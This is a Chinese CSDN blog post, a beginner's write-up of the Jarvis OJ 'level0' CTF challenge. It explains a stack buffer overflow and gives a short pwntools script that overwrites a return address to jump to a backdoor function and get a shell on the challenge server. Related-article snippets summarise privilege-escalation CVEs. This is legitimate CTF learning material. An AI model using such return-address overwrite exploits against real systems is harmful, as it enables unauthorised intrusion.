2021-01-20

最新推荐文章于 2024-06-01 21:43:54 发布

Darry-long

最新推荐文章于 2024-06-01 21:43:54 发布

阅读量88

点赞数

文章标签： pwn

本文链接：https://blog.csdn.net/m0_52632244/article/details/112910639

版权

本文详细介绍了如何利用栈溢出漏洞攻破仅开启NX防护的系统。通过IDA分析找到后门函数地址，确定溢出偏移量，并构造payload覆盖返回地址，最终实现远程控制。利用Python的pwn库发送精心构造的数据，成功交互并获取flag。

摘要由CSDN通过智能技术生成

学习笔记——新手PWN Jarvis oj leve0

1.先检查有什么保护机制

只开启了NX防护

2.用IDA打开，在这里发现了后门
在这里插入图片描述 3.记下所对应的地址（目标函数调用地址），0x400596

4.在main函数中找到了vulnerable_function函数，发现read函数存在缓存区溢出漏洞

5.然后能够通过buf计算出发生溢出的偏移量=(+0x0000000000000008) - (-0x0000000000000080)，也就是0x88，然后利用栈溢出将函数返回时的地址值换成我们所期望的值（目标函数的地址值）! 在这里插入图片描述

(这个图片是本地调试结果)

6.最后利用如下代码`

from pwn import *
io = remote("pwn2.jarvisoj.com",9881)
io.sendline(b'a'*0x88+p64(0x400596))
io.interactive()

用cat获取flag
`
在这里插入图片描述

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

Darry-long

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
1
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

APToolV7200(2021-02-01)

12-13

APTool-UMPTooV7200 是一款专门用于量产chipsbank主控U盘的工具。这款工具的主要功能是对U盘进行量产操作，也就是通过制作U盘固件，将U盘的物理存储芯片的空间划分为分区，赋予U盘可读写和存储的功能。...

gtk3-runtime-3.24.29-2021-04-29-ts-win64.exe

07-10

gtk3-runtime-3.24.29-2021-04-29-ts-win64.exe

1 条评论您还未登录，请先登录后发表或查看评论

学习笔记

m0_52632244的博客

01-27

107

题目来源 Jsarvis OJ level3 附件下载链接：level3.rar.f795bbaa1e4a3f9d467317d6df936c6b 这道题为典型的ret2libc 找到存在栈溢出的函数，很明显变量buf只有0x88字节的缓存空间，但是可以输入0x100字节的数据，所以存在溢出然后利用write输出打印得到我们想要泄露的got地址，这里我是通过rop链0x8048519来清空write的三个参数，从而通过ret将eip再次指向vulnerable_function函数，达到两次栈溢出目的

2021-01-06

qq_40504996的博客

01-06

931

运行机某个js文件访问不了。做了过滤器，没有被过滤的。其他js文件都可以。就单独一个403。考虑是否是防火墙做了一些敏感词的判断过滤。将js文件名修改试一下，或者从防火墙那方面做文章 ...

2021-01-10

qq_22667507的博客

01-10

1024

jupyter notebook中直接安装python的第三方库。例如安装pymysql ： ! pip install pymysql。升级pip：

时间类型转换的问题“2021-01-20T10:09:11Z”

JavaWHD的博客

02-22

6411

关于新手碰到时间类型转换的问题：拿到的时间为字符串，格式为：“2021-01-20T10:09:11Z”。容易理解的解决方法：先将该字符串转换为Date类型： SimpleDateFormat sdf = new SimpleDateFormat(“yyyy-MM-dd’T’HH:mm:ss’Z’”); Date applyDate = sdf.parse(“2021-01-20T10:09:11Z”); 再将Date类型转换为需要的字符串类型： SimpleDateFormat sdf1 = new

CVE-2021-36934提权复现

内心不种满鲜花就会长满杂草

01-31

1338

该漏洞由于Windows中多个系统文件的访问控制表(ACL)过于宽松，使得任何标准用户都可以从系统卷影副本中读取包括SAM、SYSETM、SECURITY在内的多个系统文件。得到用户的哈希值后，可以对其进行暴力破解，也可以直接使用本地管理员用户进行哈希传递，从而获取system权限。系统保护在windows系统中默认启动，因此如果已创建还原点，那么标准用户可直接从卷影副本中访问SAM、SYSETM、SECURITY文件。若系统中不曾创建过还原点，那么后面导出哈希时，ntlm哈希为。系统保护开启(默认开启)

【CVE-2021-3156】——漏洞复现、原理分析以及漏洞修复

IronmanJay的博客

06-01

3526

2021年01月27日，RedHat官方发布了Sudo缓冲区/栈溢出漏洞的风险通告，普通用户可以通过利用此漏洞，而无需进行身份验证，成功获取Root权限。

2021-01-02

shine_tom的博客

01-02

1318

[root@localhost doc]# man echo [root@localhost doc]# help echo echo: echo [-neE] [arg …] Write arguments to the standard output. Display the ARGs on the standard output followed by a newline. Options: -n do not append a newline -e enable interpretatio

2021-01-07

热门推荐

qq_42497621的博客

01-07

2万+

开发中遇到的问题： Data truncated for column ‘user_id’ at row 1 解决方法是看数据库与java类中的属性是否一致，我的在数据库中id的属性设置成了int型，java类中的id是String型导致了不匹配。

2021-01 补丁日:Oracle多个产品漏洞安全风险通告

爱国小白帽

01-20

1204

报告编号：B6-2021-012001 报告来源：360CERT 报告作者：360CERT 更新日期：2021-01-20 0x01事件简述 2021年01月20日，360CERT监测发现Oracle官方发布了2021年1月份的安全更新。此次安全更新发布了329个漏洞补丁，其中Oracle Fusion Middleware有60个漏洞补丁更新，主要涵盖了Oracle Weblogic、Oracle Endeca Information Discovery Integrator、Oracle WebCe.

网络攻防｜CVE-2021-42287、CVE-2021-42278域内提权

weixin_42282189的博客

12-20

2646

作者： r0n1n 免责声明：本文仅供学习研究，严禁从事非法活动，任何后果由使用者本人负责。 0x01 漏洞原理 Microsoft Windows Active Directory 域服务权限提升漏洞（CVE-2021-42278、CVE-2021-42287）攻击者可利用该漏洞将域内的普通用户权限提升到域管理员权限，造成风险和危害极大。漏洞情报来源： 1、影响版本 CVE-2021-42278 ￮ Windows Server 2012 R2 ￮ Windows Server 2012 (S.

AuditSearch2021-01-07_14-37-20_flash源码_

10-01

标题中的"AuditSearch2021-01-07_14-37-20_flash源码_"似乎是一个审计搜索的结果，日期为2021年1月7日，时间是下午2点37分，关键词是"flash源码"。这表明这是一个与Flash编程相关的源代码文件集合，可能包含用于分析...

Gerber_1-PCB__2021-01-08_20-59-38 copy.zip

07-07

标题"Gerber_1-PCB__2021-01-08_20-59-38 copy.zip"和描述中提到的文件集合，显然是一套完整的PCB设计输出，包含了PCB制造所需的所有关键信息。下面，我们将详细解析这些文件的含义和用途。 1. **Drill_PTH_Through...

2021-node-01

03-13

标题“2021-node-01”暗示了这是一个关于Node.js的学习资源，可能是课程、教程或者是项目，可能包含了2021年年初对于Node.js技术的最新理解和实践。描述中的“2021-node-01”重复，进一步确认了主题的专注性，但没有...

【超强组合】基于淘金优化算法GRO-BP-Adaboost的数据分类预测算法Matlab实现.rar

最新发布

10-08

1.版本：matlab2014/2019a/2024a 2.附赠案例数据可直接运行matlab程序。 3.代码特点：参数化编程、参数可方便更改、代码编程思路清晰、注释明细。 4.适用对象：计算机，电子信息工程、数学等专业的大学生课程设计、期末大作业和毕业设计。替换数据可以直接使用，注释清楚，适合新手

VMware Workstation Pro 和 VMware Fusion 安装与配置指南

10-08

内容概要：本文档详细指导了如何在不同的主机环境下，通过 VMWare 的两款产品——Workstation Pro 和 Fusion 进行新虚拟机的构建流程以及具体的操作要点说明。适用人群：希望在单一机器上部署多操作系统的工作环境或学习测试场景的技术人员和学生。使用场景及目标：旨在帮助初学者搭建属于自己的虚拟机实验平台，从而方便进行软件测试或者研究操作系统相关的新特性等任务，同时也有利于团队间的协作和资源调配。注意事项：文中涉及的具体操作如下载源文件、配置网络参数时要注意版权合法性问题和技术安全防范。此外还需依据各自电脑的软硬件条件适当增减虚拟机的资源设定。

科研经费管理系统 SSM毕业设计源码+数据库+论文（JAVA+SpringBoot+Vue.JS）.zip

10-08

科研经费管理系统 SSM毕业设计源码+数据库+论文（JAVA+SpringBoot+Vue.JS）启动教程：https://www.bilibili.com/video/BV1GK1iYyE2B

使用Python Matplotlib进行图形输出与保存详解（包含详细的完整的程序和数据）

10-08

内容概要：本文详细介绍了使用 Python 的 Matplotlib 库来输出和保存图形的方法。不仅涉及了基本流程，如生成图表并将之导出成PNG、PDF和SVG等不同格式的内容，还包括高级话题如设置透明度、分辨率以及制作包含图形元素的HTML页面等。文章通过一个具体的示例代码讲解了各个环节的关键细节和技术要点。适用人群：对数据可视化有兴趣的初学者及具有一定基础想要深入学习 Matplotlib 使用技巧的技术人员。使用场景及目标：适用于需要掌握 Matplotlib 不同输出选项及其特点的应用场合，尤其是当需要生成用于打印或网页展示的高质量、可自定义外观的图形时。

已知data = [ ('2021-01-01 08:00', 15), ('2021-01-01 12:00', 18), ('2021-01-01 16:00', 20), ('2021-01-02 08:00', 14), ('2021-01-02 12:00', 17), ('2021-01-02 16:00', 19) ]请写出代码对data实现指数平滑

07-12

2021-01-01 16:00:00 20 18.250000 2021-01-02 08:00:00 14 16.125000 2021-01-02 12:00:00 17 16.562500 2021-01-02 16:00:00 19 17.781250 ``` 在上述代码中，我们使用`pd.DataFrame`将data转换为DataFrame，并将...